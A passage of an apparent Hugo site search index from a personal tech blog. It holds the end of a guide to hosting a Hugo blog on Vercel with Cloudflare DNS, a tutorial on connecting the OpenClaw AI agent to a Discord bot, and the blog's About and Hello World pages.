\u0026ldquo;Vercel Authentication\u0026rdquo;\nSolution:\nGo to Vercel project Settings → General Find \u0026ldquo;Deployment Protection\u0026rdquo; Change to \u0026ldquo;Disabled\u0026rdquo; Save and redeploy Step 6: Configure Cloudflare DNS Issue 5: SSL Handshake Failed (525 Error) Error:\n525: SSL handshake failed Cause: Cloudflare SSL mode incompatible with Vercel\nSolution:\nGo to Cloudflare → SSL/TLS → Overview Change mode from \u0026ldquo;Flexible\u0026rdquo; to \u0026ldquo;Full\u0026rdquo; or \u0026ldquo;Full (strict)\u0026rdquo; Issue 6: Root Domain Not Accessible Symptom: www.d5n.xyz works, but d5n.xyz doesn\u0026rsquo;t\nCause: Missing DNS record for root domain\nSolution: Add in Cloudflare DNS:\nType: CNAME Name: @ (or www) Target: cname.vercel-dns.com Proxy: Orange ☁️ (Proxied) Deployment Workflow Local Development ↓ Hugo Build Test ↓ Git push to GitHub ↓ Vercel Auto-detect → Auto-deploy ↓ Cloudflare DNS Resolution ↓ User visits d5n.xyz Key Configuration Summary Hugo Version Control Always specify Hugo version in Vercel environment variables:\nHUGO_VERSION=0.146.5 Vercel Build Settings Build Command: hugo --gc --minify Output Directory: public Install Command: (leave blank or yarn install) Cloudflare SSL Settings Mode: Full or Full (strict) Don\u0026rsquo;t use: Flexible (causes 525 error) Final Result Domain: https://d5n.xyz Source: https://github.com/openduran/duranblog Stack: Hugo + PaperMod + Vercel + Cloudflare Cost: $12/year for domain, everything else free Lessons Learned Don\u0026rsquo;t commit public/ directory - Let Vercel build it Specify Hugo version - Avoid theme compatibility issues Disable Deployment Protection - Otherwise login is required Use Full SSL mode - Flexible causes handshake failures Complete DNS records - Both root and www subdomains need configuration Next Steps Add Google Analytics Configure comments (Giscus/Utterances) Add RSS feed Optimize SEO (sitemap, robots.txt) Configure image CDN Conclusion: Building a blog from scratch isn\u0026rsquo;t complicated—it\u0026rsquo;s mostly about troubleshooting. Once the automated deployment pipeline is set up, publishing posts is just a git push away. Hope this guide helps!\n","permalink":"https://www.d5n.xyz/en/posts/blog-setup-guide/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eToday I spent about 8 hours building this blog from scratch. This post documents the complete process, including technology choices, pitfalls encountered, and their solutions. Hope this helps anyone looking to build their own blog.\u003c/p\u003e\n\u003ch2 id=\"tech-stack-overview\"\u003eTech Stack Overview\u003c/h2\u003e\n\u003ch3 id=\"hugo---static-site-generator\"\u003eHugo - Static Site Generator\u003c/h3\u003e\n\u003cp\u003e\u003ca href=\"https://gohugo.io/\"\u003eHugo\u003c/a\u003e is a static site generator written in Go, marketed as \u0026ldquo;the world\u0026rsquo;s fastest static site generator.\u0026rdquo;\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003ePros:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e⚡ Lightning-fast builds (thousands of pages per second)\u003c/li\u003e\n\u003cli\u003e🎨 Rich theme ecosystem (300+ official themes)\u003c/li\u003e\n\u003cli\u003e📝 Native Markdown support\u003c/li\u003e\n\u003cli\u003e🔧 Single binary deployment\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eCons:\u003c/strong\u003e\u003c/p\u003e","title":"Building a Hugo Blog from Scratch: Vercel + Cloudflare Complete Guide"},{"content":"What We\u0026rsquo;re Building An AI assistant that lives in your Discord server—capable of answering questions, running tasks, and integrating with your workflows.\nWhat you\u0026rsquo;ll need:\nA Discord account A server where you\u0026rsquo;re admin About 15 minutes Step 1: Create a Discord Bot 1.1 Access the Developer Portal Go to Discord Developer Portal Click \u0026ldquo;New Application\u0026rdquo; Name it (e.g., \u0026ldquo;MyAIAssistant\u0026rdquo;) Accept the terms 1.2 Enable Bot Functionality In your app, go to \u0026ldquo;Bot\u0026rdquo; section (left sidebar) Click \u0026ldquo;Add Bot\u0026rdquo; Confirm with \u0026ldquo;Yes, do it!\u0026rdquo; 1.3 Get Your Token Critical: The bot token is like a password. Never share it or commit it to git.\nUnder Bot section, click \u0026ldquo;Reset Token\u0026rdquo; Copy the new token (starts with something like MTQ2N...) Store it securely (password manager or env variable) Step 2: Configure Bot Permissions 2.1 Privileged Gateway Intents Enable these under Bot → Privileged Gateway Intents:\n✅ MESSAGE CONTENT INTENT (required for reading messages) ✅ SERVER MEMBERS INTENT (for member-related features) ✅ PRESENCE INTENT (optional, for presence data) Without MESSAGE CONTENT INTENT, your bot can\u0026rsquo;t see what people are saying.\n2.2 OAuth2 Scopes Go to OAuth2 → URL Generator Select scopes: bot applications.commands Select bot permissions: Send Messages Read Message History Embed Links Attach Files Add Reactions Use Slash Commands 2.3 Invite Bot to Server Copy the generated URL Open in browser Select your server Authorize Step 3: Configure OpenClaw 3.1 Set Environment Variable export DISCORD_BOT_TOKEN=\u0026#34;your-token-here\u0026#34; Or add to ~/.openclaw/.env:\nDISCORD_BOT_TOKEN=your-token-here 3.2 Update hugo.toml { \u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;enabled\u0026#34;: true, \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34;, \u0026#34;groupPolicy\u0026#34;: \u0026#34;allowlist\u0026#34; } } } 3.3 Configure Channel Permissions Restrict which channels the bot can access:\n\u0026#34;channels\u0026#34;: { \u0026#34;discord\u0026#34;: { \u0026#34;enabled\u0026#34;: true, \u0026#34;token\u0026#34;: \u0026#34;${env:DISCORD_BOT_TOKEN}\u0026#34;, \u0026#34;groupPolicy\u0026#34;: \u0026#34;allowlist\u0026#34;, \u0026#34;guilds\u0026#34;: { \u0026#34;YOUR_GUILD_ID\u0026#34;: { \u0026#34;channels\u0026#34;: { \u0026#34;CHANNEL_ID_1\u0026#34;: { \u0026#34;allow\u0026#34;: true }, \u0026#34;CHANNEL_ID_2\u0026#34;: { \u0026#34;allow\u0026#34;: true } } } } } } Finding IDs:\nEnable Developer Mode in Discord (Settings → Advanced) Right-click server → \u0026ldquo;Copy Server ID\u0026rdquo; Right-click channel → \u0026ldquo;Copy Channel ID\u0026rdquo; Step 4: Test the Setup 4.1 Start OpenClaw openclaw gateway restart 4.2 Check Logs openclaw gateway status # Or check systemd logs journalctl --user -u openclaw-gateway -f 4.3 Test in Discord Go to an allowed channel Mention the bot: @MyAIAssistant hello Check for response Common Issues \u0026ldquo;401 Unauthorized\u0026rdquo; Cause: Invalid or expired token\nFix:\nReset token in Discord Developer Portal Update environment variable Restart gateway \u0026ldquo;403 Forbidden\u0026rdquo; Cause: Bot lacks permissions\nFix:\nCheck OAuth2 URL generated correct permissions Re-invite bot with updated scope Verify MESSAGE CONTENT INTENT is enabled \u0026ldquo;Cannot send messages\u0026rdquo; Cause: Channel permissions override bot permissions\nFix:\nCheck channel-specific permissions Ensure bot role is above restricted roles Verify bot is in the channel Bot doesn\u0026rsquo;t respond Checklist:\nGateway running? (openclaw gateway status) Token correct? (check for extra spaces) Channel in allowlist? (if using groupPolicy) Bot has message read permission? Mentioning correctly? (@BotName) Security Best Practices Never commit tokens – Use environment variables Use allowlists – Restrict to specific channels Rotate tokens periodically – Every 90 days Monitor bot activity – Check logs regularly Limit permissions – Only what\u0026rsquo;s necessary What\u0026rsquo;s Next Now that Discord is connected, you can:\nSet up scheduled tasks (cron jobs) Configure multiple channels for different purposes Add webhook integrations Set up DM responses See the OpenClaw Discord docs for advanced features.\nFull working configuration in the example above. Adjust channel IDs and token for your setup.\n","permalink":"https://www.d5n.xyz/en/posts/openclaw-discord-complete-guide/","summary":"\u003ch2 id=\"what-were-building\"\u003eWhat We\u0026rsquo;re Building\u003c/h2\u003e\n\u003cp\u003eAn AI assistant that lives in your Discord server—capable of answering questions, running tasks, and integrating with your workflows.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eWhat you\u0026rsquo;ll need:\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eA Discord account\u003c/li\u003e\n\u003cli\u003eA server where you\u0026rsquo;re admin\u003c/li\u003e\n\u003cli\u003eAbout 15 minutes\u003c/li\u003e\n\u003c/ul\u003e\n\u003chr\u003e\n\u003ch2 id=\"step-1-create-a-discord-bot\"\u003eStep 1: Create a Discord Bot\u003c/h2\u003e\n\u003ch3 id=\"11-access-the-developer-portal\"\u003e1.1 Access the Developer Portal\u003c/h3\u003e\n\u003col\u003e\n\u003cli\u003eGo to \u003ca href=\"https://discord.com/developers/applications\"\u003eDiscord Developer Portal\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eClick \u0026ldquo;New Application\u0026rdquo;\u003c/li\u003e\n\u003cli\u003eName it (e.g., \u0026ldquo;MyAIAssistant\u0026rdquo;)\u003c/li\u003e\n\u003cli\u003eAccept the terms\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch3 id=\"12-enable-bot-functionality\"\u003e1.2 Enable Bot Functionality\u003c/h3\u003e\n\u003col\u003e\n\u003cli\u003eIn your app, go to \u0026ldquo;Bot\u0026rdquo; section (left sidebar)\u003c/li\u003e\n\u003cli\u003eClick \u0026ldquo;Add Bot\u0026rdquo;\u003c/li\u003e\n\u003cli\u003eConfirm with \u0026ldquo;Yes, do it!\u0026rdquo;\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch3 id=\"13-get-your-token\"\u003e1.3 Get Your Token\u003c/h3\u003e\n\u003cp\u003e\u003cstrong\u003eCritical:\u003c/strong\u003e The bot token is like a password. Never share it or commit it to git.\u003c/p\u003e","title":"Setting Up OpenClaw with Discord: Complete Guide"},{"content":"About D5N D5N is a tech blog focused on AI, Intelligent Agents, and Automation Tools.\nWhat You\u0026rsquo;ll Find Here 🤖 AI \u0026amp; Agents: Practical guides on OpenClaw, LLM applications, and agent frameworks ⚙️ Automation: Workflow optimization, scripting, and productivity tools 🛠️ DevOps: Server configuration, deployment, and infrastructure tips 💡 Tutorials: Step-by-step guides with working examples About the Author I\u0026rsquo;m Duran, a tech enthusiast exploring the intersection of AI and automation. This blog documents my learning journey and practical experiments.\nContact GitHub: openduran Blog: https://www.d5n.xyz Building the future, one automation at a time.\n","permalink":"https://www.d5n.xyz/en/about/","summary":"\u003ch2 id=\"about-d5n\"\u003eAbout D5N\u003c/h2\u003e\n\u003cp\u003eD5N is a tech blog focused on \u003cstrong\u003eAI, Intelligent Agents, and Automation Tools\u003c/strong\u003e.\u003c/p\u003e\n\u003ch3 id=\"what-youll-find-here\"\u003eWhat You\u0026rsquo;ll Find Here\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e🤖 \u003cstrong\u003eAI \u0026amp; Agents\u003c/strong\u003e: Practical guides on OpenClaw, LLM applications, and agent frameworks\u003c/li\u003e\n\u003cli\u003e⚙️ \u003cstrong\u003eAutomation\u003c/strong\u003e: Workflow optimization, scripting, and productivity tools\u003c/li\u003e\n\u003cli\u003e🛠️ \u003cstrong\u003eDevOps\u003c/strong\u003e: Server configuration, deployment, and infrastructure tips\u003c/li\u003e\n\u003cli\u003e💡 \u003cstrong\u003eTutorials\u003c/strong\u003e: Step-by-step guides with working examples\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3 id=\"about-the-author\"\u003eAbout the Author\u003c/h3\u003e\n\u003cp\u003eI\u0026rsquo;m Duran, a tech enthusiast exploring the intersection of AI and automation. This blog documents my learning journey and practical experiments.\u003c/p\u003e","title":"About"},{"content":"Welcome to D5N This is the English version of my tech blog. Here I share:\n🤖 AI and Agent technologies ⚙️ Automation workflows 🛠️ DevOps practices 💡 Technical tutorials About This Blog Built with:\nHugo - Static site generator PaperMod - Clean theme Vercel - Hosting Cloudflare - DNS \u0026amp; CDN Bilingual Support This blog now supports both Chinese and English. Use the language switcher in the header to switch between languages.\nNot all articles are translated yet—I\u0026rsquo;m working on it gradually.\nStay curious, keep building.\n","permalink":"https://www.d5n.xyz/en/posts/hello-world/","summary":"\u003ch2 id=\"welcome-to-d5n\"\u003eWelcome to D5N\u003c/h2\u003e\n\u003cp\u003eThis is the English version of my tech blog. Here I share:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e🤖 AI and Agent technologies\u003c/li\u003e\n\u003cli\u003e⚙️ Automation workflows\u003c/li\u003e\n\u003cli\u003e🛠️ DevOps practices\u003c/li\u003e\n\u003cli\u003e💡 Technical tutorials\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"about-this-blog\"\u003eAbout This Blog\u003c/h2\u003e\n\u003cp\u003eBuilt with:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHugo\u003c/strong\u003e - Static site generator\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePaperMod\u003c/strong\u003e - Clean theme\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVercel\u003c/strong\u003e - Hosting\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCloudflare\u003c/strong\u003e - DNS \u0026amp; CDN\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2 id=\"bilingual-support\"\u003eBilingual Support\u003c/h2\u003e\n\u003cp\u003eThis blog now supports both Chinese and English. Use the language switcher in the header to switch between languages.\u003c/p\u003e","title":"Hello World"}]